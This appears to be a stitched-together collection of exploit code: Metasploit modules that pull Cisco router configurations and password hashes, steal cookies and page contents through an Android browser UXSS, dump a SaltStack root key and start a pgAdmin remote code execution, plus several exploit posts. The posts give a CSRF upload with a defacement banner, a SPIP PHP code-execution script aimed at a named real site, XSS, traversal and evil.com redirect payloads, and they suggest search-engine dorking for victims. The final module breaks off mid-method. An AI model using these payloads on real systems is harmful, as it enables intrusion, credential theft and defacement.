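##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2019-1653: requests the configuration export of a
# Cisco RV320/RV325 router whose management interface does not enforce access
# control on that URL, stores the export as loot, and reports the host and the
# account/password hash it contains.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options. RPORT defaults to 443 and SSL to true because
  # the export is requested over the HTTPS management interface; TARGETURI is
  # the path of the configuration export.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco RV320/RV326 Configuration Disclosure',
      'Description'    => %q{
        A vulnerability in the web-based management interface of Cisco Small Business
        RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
        remote attacker to retrieve sensitive information. The vulnerability is due
        to improper access controls for URLs. An attacker could exploit this
        vulnerability by connecting to an affected device via HTTP or HTTPS and
        requesting specific URLs. A successful exploit could allow the attacker to
        download the router configuration or detailed diagnostic information. Cisco
        has released firmware updates that address this vulnerability.
      },
      'Author'         =>
        [
          'RedTeam Pentesting GmbH <release@redteam-pentesting.de>',
          'Aaron Soto <asoto@rapid7.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '46262'],
          ['BID', '106732'],
          ['CVE', '2019-1653'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],
          ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
        ],
      'DisclosureDate' => '2019-01-24',
      'DefaultOptions' =>
        {
          'SSL' => true
        }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
      ])
  end

  # Records the recovered account in the database as a credential plus an
  # untried login against the target's HTTP(S) service.
  #
  # @param user [String] account name taken from the configuration export
  # @param hash [String] password hash taken from the export; stored as a
  #   non-replayable hash tagged with the 'md5' JtR format
  # @return the login record returned by create_credential_login
  def report_cred(user, hash)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: hash,
      private_type: :nonreplayable_hash,
      jtr_format: 'md5',
      username: user,
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Stores the raw configuration export as loot and reports the host details
  # and the credential found in it.
  #
  # The field regexes use `^`, which in Ruby anchors at a line start, so each
  # one picks the first matching line of the multi-line export. Each match is
  # indexed directly, so a field missing from the export raises NoMethodError
  # rather than being reported as absent.
  #
  # @param config [String] body of the configuration export
  def parse_config(config)
    # Report loot to database (and store on filesystem)
    stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)
    print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")

    # Report host information to database
    hostname = config.match(/^HOSTNAME=(.*)/)[1]
    model = config.match(/^MODEL=(.*)/)[1]
    mac = config.match(/^LANMAC=(.*)/)[1]
    # LANMAC is stored without separators; rebuild the colon-separated form
    mac = mac.scan(/\w{2}/).join(':')
    report_host(host: rhost,
                mac: mac,
                name: hostname,
                os_name: 'Cisco',
                os_flavor: model)

    # Report password hashes to database
    user = config.match(/^user (.*)/)[1]
    hash = config.match(/^password (.*)/)[1]
    report_cred(user, hash)
  end

  # Requests TARGETURI and dispatches on the response body.
  #
  # A body containing the sysconfig marker is parsed as a configuration export;
  # a body that redirects to /default.htm is reported as patched; any other
  # 200 body is reported as an unexpected reply. (Previously the second branch
  # was a bare `else`, so every non-sysconfig body was misreported as patched.)
  def run
    begin
      uri = normalize_uri(target_uri.path)
      # second argument: 60-second timeout for this request
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'GET',
      }, 60)
    rescue OpenSSL::SSL::SSLError
      fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
    end

    if res.nil?
      fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')
    elsif res.code != 200
      fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")
    end

    body = res.body
    if body.match(/####sysconfig####/)
      parse_config(body)
    elsif body.include?("meta http-equiv=refresh content='0; url=/default.htm'")
      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
    else
      fail_with(Failure::UnexpectedReply, 'Unexpected response body. Please validate the TARGETURI option and try again.')
    end
  end
end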
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2014-6041 (AOSP browser UXSS). It runs an HTTP
# server whose page loads each TARGET_URLS entry (in hidden iframes, or in a
# popup when BYPASS_XFO is set); the data the page's script posts back to the
# same URL is stored as loot by collect_data.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  # Module metadata and options: the list of target URLs, optional inline or
  # remote JavaScript to run in their context, and the popup-mode switches.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Android Open Source Platform (AOSP) Browser UXSS',
      'Description'    => %q{
        This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
        all versions of Android's open source stock browser before 4.4, and Android apps running
        on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
        to scrape both cookie data and page contents from a vulnerable browser window.

        If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
        which will cause a popup window to be used. This requires a click from the user
        and is much less stealthy, but is generally harmless-looking.

        By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
        module also allows running arbitrary javascript in the context of the targeted URL.
        Some sample UXSS scripts are provided in data/exploits/uxss.
      },
      'Author'         => [
        'Rafay Baloch', # Original discovery, disclosure
        'joev'          # Metasploit module
      ],
      'License'        => MSF_LICENSE,
      'Actions'        => [
        [ 'WebServer' ]
      ],
      'PassiveActions' => [
        'WebServer'
      ],
      'References'     => [
        [ 'URL', 'http://1337day.com/exploit/description/22581' ],
        [ 'OSVDB', '110664' ],
        [ 'CVE', '2014-6041' ]
      ],
      'DefaultAction'  => 'WebServer'
    ))

    register_options([
      OptString.new('TARGET_URLS', [
        true,
        "The comma-separated list of URLs to steal.",
        'http://example.com'
      ]),
      OptString.new('CUSTOM_JS', [
        false,
        "A string of javascript to execute in the context of the target URLs.",
        ''
      ]),
      OptString.new('REMOTE_JS', [
        false,
        "A URL to inject into a script tag in the context of the target URLs.",
        ''
      ]),
      OptBool.new('BYPASS_XFO', [
        false,
        "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
        false
      ]),
      OptBool.new('CLOSE_POPUP', [
        false,
        "When BYPASS_XFO is enabled, this closes the popup window after exfiltration.",
        true
      ])
    ])
  end

  # Handles every request to the served URI.
  #
  # A POST carries the JSON that the page's script sends back via
  # XMLHttpRequest; it is handed to collect_data and answered with an empty
  # body. Any other method is answered with the page itself, which embeds
  # TARGET_URLS (base64-encoded JSON), the BYPASS_XFO / CLOSE_POPUP values and
  # the base64-encoded custom_js. Note the heredoc is `<<-EOS`, so the
  # indentation below is part of the served HTML. `payload_fn` is assigned but
  # never used.
  #
  # @param cli the client connection passed to send_response_html
  # @param request the incoming HTTP request (method, uri, body)
  def on_request_uri(cli, request)
    print_status("Request '#{request.method} #{request.uri}'")

    if request.method.downcase == 'post'
      collect_data(request)
      send_response_html(cli, '')
    else
      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
      domains = datastore['TARGET_URLS'].split(',')

      html = <<-EOS
        <html>
        <body>
        <script>
          var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}"));
          var bypassXFO = #{datastore['BYPASS_XFO']};
          var received = [];

          window.addEventListener('message', function(e) {
            var data = JSON.parse(e.data);
            if (!data.send) {
              if (bypassXFO && data.i && received[data.i]) return;
              if (bypassXFO && e.data) received.push(true);
            }
            var x = new XMLHttpRequest;
            x.open('POST', window.location, true);
            x.send(e.data);
          }, false);

          function randomString() {
            var str = '';
            for (var i = 0; i < 5+Math.random()*15; i++) {
              str += String.fromCharCode('A'.charCodeAt(0) + parseInt(Math.random()*26))
            }
            return str;
          }

          function installFrame(target) {
            var f = document.createElement('iframe');
            var n = randomString();
            f.setAttribute('name', n);
            f.setAttribute('src', target);
            f.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
            f.onload = function(){
              attack(target, n);
            };
            document.body.appendChild(f);
          }

          function attack(target, n, i, cachedN) {
            var exploit = function(){
              window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
                'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
                'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
                '));}void(0);', n);
            }
            if (!n) {
              n = cachedN || randomString();
              var closePopup = #{datastore['CLOSE_POPUP']};
              var w = window.open(target, n);
              var deadman = setTimeout(function(){
                clearInterval(clear);
                clearInterval(clear2);
                attack(targets[i], null, i, n);
              }, 10000);
              var clear = setInterval(function(){
                if (received[i]) {
                  if (i < targets.length-1) {
                    try{ w.stop(); }catch(e){}
                    try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
                  }

                  clearInterval(clear);
                  clearInterval(clear2);
                  clearTimeout(deadman);

                  if (i < targets.length-1) {
                    setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
                  } else {
                    if (closePopup) w.close();
                  }
                }
              }, 50);
              var clear2 = setInterval(function(){
                try {
                  if (w.location.toString()) return;
                  if (w.document) return;
                } catch(e) {}
                clearInterval(clear2);
                clear2 = setInterval(exploit, 50);
              },20);
            } else {
              exploit();
            }
          }

          var clickedOnce = false;
          function onclickHandler() {
            if (clickedOnce) return false;
            clickedOnce = true;
            attack(targets[0], null, 0);
            return false;
          }

          window.onload = function(){
            if (bypassXFO) {
              document.querySelector('#click').style.display='block';
              window.onclick = onclickHandler;
            } else {
              for (var i = 0; i < targets.length; i++) {
                installFrame(targets[i]);
              }
            }
          }
        </script>
        <div style='text-align:center;margin:20px 0;font-size:22px;display:none'
             id='click' onclick='onclickHandler()'>
          The page has moved. <a href='#'>Click here to be redirected.</a>
        </div>
        </body>
        </html>
      EOS

      print_status("Sending initial HTML ...")
      send_response_html(cli, html)
    end
  end

  # Parses the POSTed JSON and, when it carries a 'url' field, stores the raw
  # request body as loot named after that URL.
  #
  # NOTE(review): `cli` is not defined in this method's scope (it is only a
  # parameter of on_request_uri), so the store_loot call looks like it would
  # raise NameError — confirm against the framework version in use.
  #
  # @param request the incoming HTTP request whose body is JSON
  def collect_data(request)
    response = JSON.parse(request.body)
    url = response['url']
    if response && url
      file = store_loot("android.client", "text/plain", cli.peerhost, request.body, "aosp_uxss_#{url}", "Data pilfered from uxss")
      print_good "Collected data from URL: #{url}"
      print_good "Saved to: #{file}"
    end
  end

  # Builds the URL of this server's `/catch` endpoint from the SSL, SRVHOST,
  # SRVPORT and URIPATH options (SRVHOST 0.0.0.0 is replaced by the source
  # address; port 80 is omitted). Not referenced elsewhere in this class.
  #
  # @return [String]
  def backend_url
    proto = (datastore["SSL"] ? "https" : "http")
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
  end

  # JavaScript embedded (base64-encoded) in the served page: the REMOTE_JS
  # loader snippet, if any, followed by CUSTOM_JS.
  #
  # @return [String]
  def custom_js
    rjs_hook + datastore['CUSTOM_JS']
  end

  # Snippet that appends a <script> tag pointing at REMOTE_JS, or an empty
  # string when REMOTE_JS is blank. The option value is interpolated into a
  # single-quoted JS string without escaping.
  #
  # @return [String]
  def rjs_hook
    remote_js = datastore['REMOTE_JS']
    if remote_js.present?
      "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
    else
      ''
    end
  end

  # Entry point: delegates to `exploit`, which comes from the included
  # HttpServer mixin (presumably starts the web server — not visible here).
  def run
    exploit
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2020-11651: connects to a Salt master's ZeroMQ
# request server (default port 4506), sends an unauthenticated
# `_prep_auth_info` command and reads the root key out of the MessagePack
# reply. `run` returns a CheckCode so the companion exploit module can reuse
# it as its check.
class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::ZeroMQ
  include Msf::Auxiliary::Report

  # Module metadata; the only option registered is RPORT (4506).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SaltStack Salt Master Server Root Key Disclosure',
        'Description' => %q{
          This module exploits unauthenticated access to the _prep_auth_info()
          method in the SaltStack Salt master's ZeroMQ request server, for
          versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
          root key used to authenticate administrative commands to the master.

          VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as
          well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual
          Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,
          1.3, 1.5, and 1.6 in certain configurations, are known to be affected
          by the Salt vulnerabilities.

          Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
          well as Vulhub's Docker image.
        },
        'Author' => [
          'F-Secure', # Discovery
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-11651'], # Auth bypass (used by this module)
          ['CVE', '2020-11652'], # Authed directory traversals (not used here)
          ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],
          ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],
          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],
          ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']
        ],
        'DisclosureDate' => '2020-04-30', # F-Secure advisory
        'License' => MSF_LICENSE,
        'Actions' => [
          ['Dump', { 'Description' => 'Dump root key from Salt master' }]
        ],
        'DefaultAction' => 'Dump',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options([
      Opt::RPORT(4506)
    ])
  end

  # Connects and negotiates over ZeroMQ, requests the auth info, extracts the
  # root key and stores it as a password credential for the 'root' user on
  # the salt/zeromq service. The connection is always closed in `ensure`.
  #
  # @return [Exploit::CheckCode] Vulnerable (carrying the key as its reason)
  #   when a key was found, Safe when the reply held no key, Unknown on
  #   EOFError or connection errors
  def run
    # These are from Msf::Exploit::Remote::ZeroMQ
    zmq_connect
    zmq_negotiate

    unless (root_key = extract_root_key(yeet_prep_auth_info))
      print_error('Could not find root key in serialized auth info')

      # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
      return Exploit::CheckCode::Safe
    end

    print_good("Root key: #{root_key}")

    # I hate this API, but store the root key in creds, too
    create_credential_and_login(
      workspace_id: myworkspace_id,
      module_fullname: fullname,
      origin_type: :service,
      address: rhost,
      port: rport,
      protocol: 'tcp',
      service_name: 'salt/zeromq',
      username: 'root',
      private_data: root_key,
      private_type: :password
    )

    # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
    Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!
  rescue EOFError, Rex::ConnectionError => e
    print_error("#{e.class}: #{e.message}")
    Exploit::CheckCode::Unknown
  ensure
    # This is from Msf::Exploit::Remote::ZeroMQ
    zmq_disconnect
  end

  # Sends the `_prep_auth_info` command as a serialized clear load and reads
  # one reply from the socket. Fails the module when nothing comes back or
  # when the reply does not contain the user / UserAuthenticationError / root
  # sequence the module expects.
  #
  # @return [String] the reply with its first four bytes dropped (assumed
  #   ZeroMQ framing), i.e. what is assumed to be the MessagePack load
  def yeet_prep_auth_info
    print_status("Yeeting _prep_auth_info() at #{peer}")

    zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))

    unless (res = sock.get_once)
      fail_with(Failure::Unknown, 'Did not receive auth info')
    end

    # /m lets .+ span newlines in the serialized reply
    unless res.match(/user.+UserAuthenticationError.+root/m)
      fail_with(Failure::UnexpectedReply,
                "Did not receive serialized auth info: #{res.inspect}")
    end

    vprint_good('Received serialized auth info')

    # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack "load"
    res[4..]
  end

  # Unpacks the MessagePack load and reads the 'root' entry of the element at
  # index 2 (the index is an assumption, per the comment below).
  #
  # @param auth_info [String] MessagePack-encoded reply from yeet_prep_auth_info
  # @return [String, nil] the root key, or nil when index 2 is nil or the data
  #   is malformed / lacks a 'root' key (the error is printed, not raised)
  def extract_root_key(auth_info)
    # Fetch root key from appropriate index of deserialized data, presumably
    MessagePack.unpack(auth_info)[2]&.fetch('root')
  rescue EOFError, KeyError, MessagePack::MalformedFormatError => e
    print_error("#{__method__} failed: #{e.message}")
    nil
  end

end
<pre><code>=============================================================================================================================================<br />| # Title : Water Billing Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/wbms_1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.<br /><br />[+] Line 33 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Direct File Upload</title><br /></head><br /><body><br /><br /> <h2>Direct File Upload</h2><br /> <form id="uploadForm"><br /> <label for="fileInput">Select File:</label><br /> <input type="file" id="fileInput" name="fileInput" required><br><br><br /><br /> <button type="button" onclick="uploadFile()">Upload File</button><br /> </form><br /><br /> <script><br /> function uploadFile() {<br /> const fileInput = document.getElementById('fileInput').files[0];<br /><br /> if (!fileInput) {<br /> alert('Please select a file.');<br /> return;<br /> }<br /><br /> const formData = new FormData();<br /> formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');<br /> formData.append('img', fileInput);<br /><br /> console.log("(+) Uploading file...");<br /><br /> fetch('http://127.0.0.1/wbms/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL<br /> method: 
'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> if (data === '1') {<br /> console.log("(+) File upload seems to have been successful!");<br /> } else {<br /> console.log("(-) Oh no, the file upload seems to have failed!");<br /> }<br /> })<br /> .catch(error => console.error("(-) Error during file upload:", error));<br /> }<br /> </script><br /><br /></body><br /></html><br /><br /> <br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 Directory traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload : //bower_components/bootstrap/dist/css/../../Gemfile<br /><br />[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/bower_components/bootstrap/dist/css/../../Gemfile<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.6 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // توليد الحمولة مع تضمين الأمر المراد تنفيذه<br /> return "[<img" . rand(10000000, 99999999) . 
">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // إعداد بيانات POST التي سيتم إرسالها إلى الهدف<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // تهيئة طلب HTTP باستخدام دالة cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // إضافة رؤوس مخصصة لتجاوز المنع<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // تنفيذ الطلب<br /> $response = curl_exec($ch);<br /><br /> // تحقق من وجود أخطاء في cURL<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// مثال على الاستخدام<br />$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي<br />$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : WordPress GetYourGuide Ticketing plugin 1.0.6 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://downloads.wordpress.org/plugin/getyourguide-ticketing.1.0.6.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Affected element : <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input><br /><br />[+] Install the ‘GetYourGuide Ticketing’ plugin and activate it.<br /><br />[+] Navigate to GYG-Ticketing.<br /><br />[+] Use payload : ` “><img src=x onerror=alert(1)>`<br /><br />[+] Go to the link builder to verify the XSS pop-up.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : WordPress SeatReg plugin 1.54.0 open redirection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://wordpress.org/plugins/seatreg/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] An open redirection vulnerability occurs when a web application or server<br /> uses an unvalidated user-submitted link to redirect the user to a given<br /> website or page.<br /><br />[+] Use payload : new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com<br /><br />[+] POST /wp-admin/admin-post.php HTTP/1.1<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : WordPress WP Event Manager plugin 3.1.44 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://wordpress.org/plugins/wp-event-manager/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Install the wp-event-manager plugin and activate it.<br /><br />[+] Go to Event Manager —> Add New. In the “Event Title” field at the top, enter the XSS payload “><img src=xonerror=alert(1)> and hit Publish.<br /><br />[+] Open the newly created event’s URL, /event/{id}/, and the XSS will trigger.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'pgAdmin Binary Path API RCE',<br /> 'Description' => %q{<br /> pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)<br /> vulnerability through the validate binary path API. This vulnerability<br /> allows attackers to execute arbitrary code on the server hosting PGAdmin,<br /> posing a severe risk to the database management system's integrity and the security of the underlying data.<br /><br /> Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'M.Selim Karahan', # metasploit module<br /> 'Mustafa Mutlu', # lab prep. 
and QA<br /> 'Ayoub Mokhtar' # vulnerability discovery and write up<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2024-3116'],<br /> [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'],<br /> [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116']<br /> ],<br /> 'Platform' => ['windows'],<br /> 'Arch' => ARCH_X64,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2024-03-28',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8000),<br /> OptString.new('USERNAME', [ false, 'User to login with', '']),<br /> OptString.new('PASSWORD', [ false, 'Password to login with', '']),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> version = get_version<br /> return CheckCode::Unknown('Unable to determine the target version') unless version<br /> return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')<br /><br /> CheckCode::Vulnerable("pgAdmin version #{version} is affected")<br /> end<br /><br /> def set_csrf_token_from_login_page(res)<br /> if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/<br /> @csrf_token = Regexp.last_match(1)<br /> # at some point between v7.0 and 7.7 the token format changed<br /> elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)<br /> @csrf_token = element['value']<br /> end<br /> end<br /><br /> def set_csrf_token_from_config(res)<br /> if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/<br /> @csrf_token = Regexp.last_match(1)<br /> # at some point between v7.0 and 7.7 the token format changed<br /> 
else
  # Trailing branch of a method whose head lies above this excerpt (referenced
  # below as set_csrf_token_from_config): the token is pulled out of the
  # "pgAdmin['csrf_token'] = '...'" assignment in the response body. A body
  # without that assignment leaves @csrf_token nil.
  @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
end
end

# Probes TARGETURI with a GET and decides from the redirect target whether the
# instance enforces a login.
#
# Returns true when the 302 Location contains 'login', false when it contains
# 'browser', and nil (falsy) for any other status or Location value, which the
# callers below treat the same as "no login required".
#
# NOTE(review): a 302 without a Location header raises NoMethodError here
# (nil['login']) instead of a fail_with; every call also costs one round trip,
# and exploit/csrf_token/get_version each call it separately.
def auth_required?
  res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
  if res&.code == 302 && res.headers['Location']['login']
    true
  elsif res&.code == 302 && res.headers['Location']['browser']
    false
  end
end

# Fetches browser/js/utils.js and reads the "pgAdmin['platform'] = '...'"
# assignment from it.
#
# Returns true only when that value is 'win32'; returns nil (falsy) when the
# request does not come back with HTTP 200, so a missing or blocked utils.js
# is indistinguishable from a non-Windows host for the caller.
def on_windows?
  res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
  if res&.code == 200
